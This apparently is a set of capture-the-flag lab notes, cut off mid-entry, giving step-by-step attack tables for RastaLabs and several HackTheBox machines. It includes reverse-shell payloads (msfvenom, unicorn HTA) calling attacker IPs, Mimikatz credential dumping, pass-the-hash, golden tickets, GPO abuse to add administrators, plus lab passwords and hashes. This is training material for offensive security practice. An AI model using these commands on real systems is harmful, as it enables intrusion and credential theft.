Links
Comment on page

Network Scenarios

Network#1

LLMNR Poisoning->AS-REP Roast->ForceChangePassword->GenericWrite->Password Spraying->RunForrestRun.exe->RunForrestRun.exe->Abusing Vulnerable GPO->Abusing MSSQL Service Database->Abusing Domain Trusts

Network#2

Service Permission->ForceChangePassword->Abuse ACLs->Abuse SQL Instance->Abuse Service->pass the ticket->golden ticket

Network#3

always elevated->constrained delegation->unconstrained delegation print bug->cross trust->Abuse MSSQL Service

Network#4

Bypass AMSI->always elevated->constrained delegation->Pass the ticket->Abuse SQL Instance->Abuse GPO->DSync Attack

# Network#5

ID
Stage
Techniques
Commands
1
Enumeration
Online search for lab IP range
N/A
2
Enumeration
Port scanning with masscan
masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0
3
Enumeration
Detailed host scanning with nmap
nmap (specific commands not provided)
4
Enumeration
Finding domain names with crackmapexec
crackmapexec (specific commands not provided)

Reel

ID
Stage
Techniques
Commands
1
Recon
Nmap scanning
nmap -sC -sV -oA nmap/result 10.10.10.210
2
Enumeration
Gobuster directory scanning
gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
3
Credential Harvesting
Gathering usernames
Gather usernames manually and create a user.txt file
4
Credential Harvesting
Password spraying
python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01
5
Phishing
Sending phishing emails
Use Outlook to send phishing emails and capture NTLMv2 hash with Responder
6
Hash Cracking
Cracking NTLMv2 hash
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
7
Access
PowerShell remote session
$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
8
Privilege Escalation
Creating a Symlink
New-Item -ItemType Junction -Path 'C:\\ProgramData\\root' -Target 'C:\\Users\\Administrator'
9
Privilege Escalation
Using Check-File command
Check-File C:\\programdata\\root\\Desktop\\root.txt
10
Exfiltration
Transferring files with nc.exe
iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe'

Jewel

ID
Stage
Techniques
Commands
1
Recon
Nmap scanning
nmap -sC -sV -oA nmap/result 10.10.10.211
2
Web Enumeration
Checking server with Wappalyzer
Use Wappalyzer to identify backend technologies
3
Web Enumeration
Analyzing .git directory
Check the Gemfile in the .git directory for Ruby and Gem versions
4
Exploitation
Exploiting Ruby on Rails
Use a Ruby on Rails exploit
5
Post-Exploitation
Capturing request in Burp
Capture the request and modify it with the exploit
6
Post-Exploitation
Getting a reverse shell
Use netcat listener and send the exploit to get a reverse shell
7
Privilege Escalation
Cracking password hashes
Use John the Ripper to crack password hashes found in /var/backups
8
Privilege Escalation
Using .google_authenticator file
Use the contents of .google_authenticator to bypass two-factor authentication
9
Privilege Escalation
Synchronizing time for successful exploit
Adjust the system time to match the timezone for the exploit to work
10
Privilege Escalation
Gaining root access with GTFOBins
sudo gem open -e "/bin/sh -c /bin/sh" rdoc to gain root access

Atom

ID
Stage
Techniques
Commands
1
Recon
Nmap scanning
nmap -sV -sC -oN nmap 10.10.10.237
2
File Analysis
Analyzing executable file
file heedv1\\ Setup\\ 1.0.0.exe
3
SMB Enumeration
Enumerating SMB shares
smbclient -L \\\\10.10.10.237
4
SMB File Transfer
Transferring files via SMB
smbclient \\\\\\\\10.10.10.237\\Software_Updates then get UAT_Testing_Procedures.pdf
5
Exploitation
Crafting malicious binary
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "r'sp00f.exe"
6
YML File Creation
Creating a .yml file for the exploit
Manual creation of latest.yml file
7
SMB File Transfer
Uploading .yml file via SMB
smbclient \\\\\\\\10.10.10.237\\Software_Updates then put latest.yml
8
Reverse Shell
Obtaining a reverse shell
Use Metasploit to listen for the reverse shell
9
Redis Exploitation
Exploiting Redis
redis-cli -h 10.10.10.237 then get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
10
Password Decryption
Decrypting password
python3 decrypt.py with the script provided in the summary

Network1

ID
Stage
Techniques
Commands
1
Data Analysis
Reading pcap file
Use NetworkMiner to read the .dmp file and extract the secret file
2
Cryptography
Decoding the flag
Use filecryptopgraphy.psm1 PowerShell module
3
File Preparation
Preparing files for decryption
Rename the secret file to secret.txt.AES on ws04
4
Key Conversion
Converting key for decryption
`$key = Get-Content key.txt
5
File Decryption
Decrypting the file
Unprotect-File '.\\secret.txt.AES' -Algorithm AES -Key $key
6
Flag Retrieval
Retrieving the flag
The flag is RASTA{cryp70_3xf1l7r4710n}

Network2

ID
Stage
Techniques
Commands
1
Credential Dumping
Enumerating credentials on WS02
Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force
2
Credential Dumping
Using Mimikatz to dump creds
Upload mimikatz.exe and execute sekurlsa::dpapi to get the master key
3
Credential Decryption
Decrypting credentials
dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84...
4
Port Forwarding
Setting up port forwarding
portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389
5
RDP Connection
Connecting via RDP with Remmina
Install Remmina, import sql01.rdp, change host, export to .rdp file
6
RDP Connection
Using xfreerdp to connect
xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local
7
Flag Retrieval
Retrieving the flag
The flag is RASTA{c00k1n6_w17h_645_n0w}

Network3

ID
Stage
Techniques
Commands
1
Credential Enumeration
Finding LAPS group members
Enumeration to find ngodfrey_adm is part of LAPS group on WS05
2
Credential Access
Dumping credentials with PowerSploit
powershell -ep bypass then Import-module ./PowerSploit.psd1
3
Credential Access
Using credentials for access
$SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force then $cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\\ngodfrey_adm', $SecPassword)
4
Credential Access
Getting AD object with credentials
Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred
5
Local Admin Passwords
Retrieving local admin passwords
Passwords are listed for WS01, WS02, WS03, WS04, WS05
6
Port Forwarding
Setting up port forwarding with Meterpreter
portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445 and similar for other ports
7
Exploitation
Using MS17-010 exploit for admin shell
exploit/windows/smb/ms17_010_psexec with lport 80, 443, 8080
8
Flag Retrieval
Retrieving flags from WS02 and WS04
Flags are RASTA{3v3ryb0dy_l0v35_l4p5}, RASTA{wh3r3_w45_2f4_!?}, RASTA{50m371m35_y0u_mu57_b4ck7r4ck}
9
Post-Exploitation
Running Mimikatz on WS02
privilege::debug then sekurlsa::logonPasswords
10
File Permissions
Modifying file permissions for flag
icacls flag.txt /grant administrator:F or icacls flag.txt /grant RLAB\\ahope:F

Network4

ID
Stage
Techniques
Commands
1
Privilege Escalation
AS-REP Roasting
Import-module ./asreproast.ps1 Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 | select -expand hash
2
Hash Extraction
Saving Hash
Copy the hash to a txt file and save it with UTF-8 encoding
3
Wordlist Creation
Using kwprocessor
./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt
4
Password Cracking
Using John the Ripper
Use John the Ripper (jumbo version) to crack the hash
5
Credential Use
User Enumeration
net use H: \\\\fs01.rastalabs.local\\home$\\ngodfrey /user:ngodfrey "zaq123$%^&*()_+"
6
Flag Retrieval
Accessing Flag
The flag is RASTA{k3rb3r05_15_7r1cky}

Network5

ID
Stage
Techniques
Commands
1
Enumeration
Viewing shares on fs01
net view \\fs01 /all
2
Enumeration
Using PowerSploit for enumeration
powershell -ep bypass Import-module ./PowerSploit.psd1 Get-NetShare \\fs01
3
Flag Retrieval
Accessing open shares
Flag is RASTA{ju1cy_1nf0_1n_0p3n_5h4r35}

Network6

ID
Stage
Techniques
Commands
1
Phishing
Creating phishing HTA
python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta
2
Web Server Setup
Hosting HTA on Apache2
copy index.html launcher.hta /var/www/html service apache2 start
3
Listener Setup
Setting up Metasploit listener
msfconsole -r unicorn.rc
4
Share Enumeration
Viewing shares on the network
net share net view net use K: \\\\hostname\\share$ net view \\\\hostname /all
5
User Enumeration
Displaying domain user accounts
net user /domain
6
User Information
Viewing user info
net user [username] /domain
7
Group Enumeration
Viewing domain group members
net group finance /domain
8
Drive Enumeration
Listing logical drives
fsutil fsinfo drives wmic logicaldisk get name diskpart > list volume
9
Network Recon
Pinging servers for IP addresses
ping DC01 ping FS01 ping MX01 ping NIX01 ping SQL01 ping WS01 ping WS02 ping WS03 ping WS05
10
Flag Retrieval
Accessing the flag
Flag is RASTA{w007_f007h0ld_l375_pwn}
11
KeePass Database
Found KeePass database and key file
Located in M:\\Documents

Network7

ID
Stage
Techniques
Commands
1
User Enumeration
Finding user directory on fs01
net user ahope /domain
2
Network Drive Mount
Mounting network drive to access file
net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"
3
File Conversion
Converting .ppk to OpenSSH format
puttygen nix01.ppk -O private-openssh -o nix
4
Network Configuration
Adding route and running proxy server
Commands for adding route and running socks4a proxy server on ws01 not provided in summary
5
SSH Connection
Connecting via SSH with proxychains
proxychains ssh -i nix [email protected]
6
Privilege Escalation
Using exploit for privilege escalation
Compile exploit with gcc exp1.c -o exploit
7
File Transfer
Transferring exploit to target
proxychains scp -i nix -r exploit [email protected]:/home/ahope
8
File Download
Downloading file from remote to local
proxychains scp -i nix [email protected]:/usr/local/sbin/paycalc /root/Desktop/rasta
9
Flag Retrieval
Retrieving the flag
Flag is RASTA{y0ur3_4_b4ll3r_70_637_7h15}

Network8

ID
Stage
Techniques
Commands
1
Port Forwarding
Forwarding port to ws01
portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445
2
Remote Execution
Using Metasploit psexec for shell
Use msf psexec to get a shell on ws01
3
Remote Execution
Using Impacket psexec for shell
Use Impacket psexec to get a shell on ws01, add route in meterpreter
4
Proxy Configuration
Setting SOCKS4a proxy in Metasploit
Set socks4a proxy in msf, then edit /etc/proxychains.conf
5
Enumeration
Using CrackMapExec to enumerate
proxychains crackmapexec 10.10.120.1 -u rweston_da -H <hash> --ntds drsuapi
6
Hash Dumping
Dumping hashes
Dump hashes with CrackMapExec and proxychains
7
Credential Access
Accessing vault with Mimikatz
Use Mimikatz on ws01 to access vault credentials
8
Credential Decryption
Decrypting credentials
dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\<hash> /masterkey:<masterkey>
9
Impersonation
Impersonating user with Incognito
In meterpreter, load incognito and impersonate rweston
10
Clipboard Monitoring
Monitoring clipboard for credentials
Transfer shell to Empire and monitor clipboard
11
RDP Connection
Connecting via RDP with credentials
xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10
12
Flag Retrieval
Retrieving the flag
Flag is RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}

Network9

ID
Stage
Techniques
Commands
1
Port Forwarding
Forwarding port to ws05
portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445
2
Credential Use
Using rweston_da hash
rweston_da hash --- ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa
3
Exploitation
Exploit via smb/psexec
Use the hash with smb/psexec to exploit
4
Flag Retrieval
Retrieving the flag
Flag is RASTA{53rv1c3_4bu53_f7w}

Network10

ID
Stage
Techniques
Commands
1
Credential Use
Using epugh_adm credentials
Log in to web01 (10.10.110.10) and then RDP to sql01 (10.10.122.15) using epugh_adm creds
2
Lateral Movement
RDP to fs01 with gopikrishna
RDP to fs01 with user gopikrishna [local admin]
3
Malware Execution
Running p0wnedshell.exe
Run p0wnedshell.exe with admin cmd
4
Credential Dumping
Invoke Mimikatz from p0wnedshell
Use option 4 in p0wnedshell, invoke Mimikatz to get rweston_da NTLM hash
5
Credential Use
Pass-the-hash with Mimikatz
sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa
6
Golden Ticket Attack
Perform DCSync to get krbtgt hash
Use option 10 in p0wnedshell, perform DCSync
7
Golden Ticket Attack
Generate golden ticket
kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket
8
Golden Ticket Attack
Use golden ticket
kerberos::ptt C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket
9
Flag Retrieval
Accessing the flag
pushd \\\\dc01.rastalabs.local\\C$ Flag is RASTA{r4574l4b5_ch4mp10n}

Network11

ID
Stage
Techniques
Commands
1
Initial Access
Using epugh_adm credentials
Log in to web01 (10.10.110.10)
2
Lateral Movement
RDP to sql01 with epugh_adm creds
Take RDP of sql01 (10.10.122.15) using epugh_adm credentials
3
Database Access
Start SQL Management Studio
Start SQL Management Studio and connect via Windows authentication
4
Database Querying
Querying SQL database
use umbraco; SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'
5
Flag Retrieval
Retrieving the flag from database
select * from Flag Flag is RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}

Network12

ID
Stage
Techniques
Commands
1
Credential Use
Logging in with epugh_adm credentials
mstsc /v:web01 /u:epugh_adm /p:[password]
2
Lateral Movement
RDP to sql01 using epugh_adm
mstsc /v:sql01 /u:epugh_adm /p:[password]
3
GPO Enumeration
Enumerating GPO permissions
`Get-NetGPO
4
Group Membership
Checking group members
net user epugh_adm /domain
5
GPO Permission
Finding GPO with weak permissions
`Get-NetGPO -ComputerName fs01.rastalabs.local
6
OU Enumeration
Finding host with specific policy
`Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}"
7
Policy Enumeration
Identifying applied policy
`Get-NetGPO -ComputerName fs01.rastalabs.local
8
GPO Abuse
Creating and applying immediate tasks
New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force
9
File Permissions
Modifying permissions for flag.txt
icacls flag.txt /grant administrators:F
10
Flag Retrieval
Retrieving the flag
Flag is RASTA{6p0_4bu53_15_h4rdc0r3}

SneakyMailer

ID
Stage
Techniques
Commands
1
Initial Recon
Nmap scan
nmap -sC -sV 10.10.10.197
2
DNS Enumeration
Brute-force subdomains
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185
3
Email Gathering
Extract emails
Extract emails from http://sneakycorp.htb/team.php to mails.txt
4
Phishing
Send phishing emails
Use swaks to send emails to addresses in mails.txt
5
Credential Harvesting
Decode credentials
Use Burp Suite to decode credentials from intercepted traffic
6
Email Client Setup
Configure email client
Set up evolution with SMTP server and [email protected] credentials
7
FTP Access
Access FTP
ftp 10.10.10.197 with credentials obtained
8
Reverse Shell
Upload and trigger reverse shell
Upload rev.php via FTP and trigger with curl
9
Privilege Escalation
Add SSH key to authorized keys
Add generated SSH key to /home/low/.ssh/authorized_keys via malicious package
10
Sudo Exploitation
Exploit sudo permissions
Use sudo /usr/bin/pip3 to execute a malicious package with a reverse shell

Mango

ID
Stage
Techniques
Commands
1
Port Scanning
Masscan and Nmap
masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0 nmap [options] [target]
2
Web Enumeration
Checking web ports
Access web service on ports 80 and 443
3
SSL Certificate
Viewing certificate
View SSL certificate details
4
Host File Editing
Adding VHOST to hosts file
Edit /etc/hosts to add staging-order.mango.htb
5
NoSQL Injection
Bypassing login
Use Burp Suite to intercept and modify request for NoSQL injection
6
Data Extraction
Automating credential extraction
Run Python script to extract credentials for admin and mango users
7
SSH Connection
Accessing SSH
SSH into the server using extracted credentials
8
User Flag Access
Retrieving user flag
Use su to login as admin and retrieve user flag
9
Privilege Escalation
Exploiting SUID file
Use SUID file to read root flag or exploit for root access
10
Root Flag Access
Reading root flag
Run binary or use jjs to read root flag

Time

ID
Stage
Techniques
Commands
1
Reconnaissance